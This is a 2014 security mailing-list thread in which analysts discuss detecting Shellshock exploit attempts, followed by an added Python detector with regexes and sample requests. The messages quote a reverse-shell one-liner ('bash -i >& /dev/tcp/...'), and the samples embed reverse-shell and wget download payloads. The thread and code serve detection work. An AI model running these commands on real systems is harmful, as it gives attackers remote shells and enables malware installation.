[Emerging-Sigs] Do you have a rule for this?
livio at metaflows.com
Fri Sep 26 14:41:05 EDT 2014
Yes, we are seeing all kinds of stuff..
But I would think a rule for this would be good independently of the
bash -i >& /dev/tcp/<bad_ip>/<bad port> 0>&1
in the payload is probably very bad..
On 09/26/2014 11:25 AM, Will Metcalf wrote:
> Was thinking about this, and also curl/wget/etc with args inbound to
> web_servers. Have also seen direct wget's for ELF bins, Perl DDoS
> bots, Perl Downloaders etc.
> On Fri, Sep 26, 2014 at 1:19 PM, Livio Ricciulli <livio at metaflows.com> wrote:
> We have been seeing the bash exploit trying to execute:
> bash -i >& /dev/tcp/<bad_ip>/<bad port> 0>&1
> This will give the bad_ip a shell to the attacker. They would
> typically execute a wget followed by Trojan install.
> I was wondering, do you already have a rule that detects the above?
> If someone was executing that in anything, it would be bad, I think.
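An added example, not part of the original thread and not an Emerging Threats rule: Python detection logic for the two things the messages ask about, the `bash -i >& /dev/tcp/<ip>/<port>` redirect and wget/curl with a URL argument, matched anywhere in a raw inbound HTTP request after percent-decoding. The function names, regexes and sample requests are assumptions constructed for this example.

```python
import re
from urllib.parse import unquote_plus

# bash pseudo-device path from the thread: /dev/tcp/<ip>/<port> (udp also exists)
DEV_TCP = re.compile(r"/dev/(?:tcp|udp)/([^/\s]+)/(\d{1,5})")
# interactive shell redirected into that device, e.g. "bash -i >& /dev/tcp/..."
SHELL_REDIR = re.compile(r"\b(?:ba)?sh\s+-i\s*[0-9]*>&?\s*/dev/(?:tcp|udp)/")
# downloader invoked with a URL argument (the curl/wget case from the reply);
# up to six option tokens may sit between the command and the URL
FETCH = re.compile(
    r"\b(?:wget|curl)[ \t]+(?:\S+[ \t]+){0,6}?(?:https?|ftp)://\S+", re.I)


def normalize(raw: str, max_rounds: int = 3) -> str:
    """Percent-decode repeatedly so single and double encoding both match."""
    for _ in range(max_rounds):
        decoded = unquote_plus(raw)
        if decoded == raw:
            break
        raw = decoded
    return raw


def scan_request(raw: str) -> dict:
    """Return which indicators appear anywhere in a raw inbound HTTP request."""
    text = normalize(raw)
    hit = DEV_TCP.search(text)
    return {
        "dev_tcp": bool(hit),
        "shell_redirect": bool(SHELL_REDIR.search(text)),
        "fetcher": bool(FETCH.search(text)),
        "callback": f"{hit.group(1)}:{hit.group(2)}" if hit else None,
    }


# Constructed sample requests (documentation addresses, not real traffic).
SAMPLES = {
    "header": "GET /cgi-bin/status HTTP/1.1\r\nHost: www.example.com\r\n"
              "User-Agent: bash -i >& /dev/tcp/192.0.2.10/4444 0>&1\r\n\r\n",
    "encoded": "GET /cgi-bin/a?x=bash%20-i%20%3E%26%20%2Fdev%2Ftcp"
               "%2F192.0.2.10%2F4444%200%3E%261 HTTP/1.1\r\n\r\n",
    "double": "GET /a?x=bash%2520-i%2520%253E%2526%2520%252Fdev%252Ftcp"
              "%252F192.0.2.10%252F8080 HTTP/1.1\r\n\r\n",
    "wget": "GET / HTTP/1.1\r\nCookie: wget -O /tmp/x http://192.0.2.10/x\r\n\r\n",
    "benign": "GET /docs/bash-tips.html?q=tcp+redirect HTTP/1.1\r\n\r\n",
}

if __name__ == "__main__":
    for name, req in SAMPLES.items():
        print(name, scan_request(req))
```

The `callback` field gives the address and port the redirect points at, which is the value to pivot on in flow logs when checking whether an outbound connection followed.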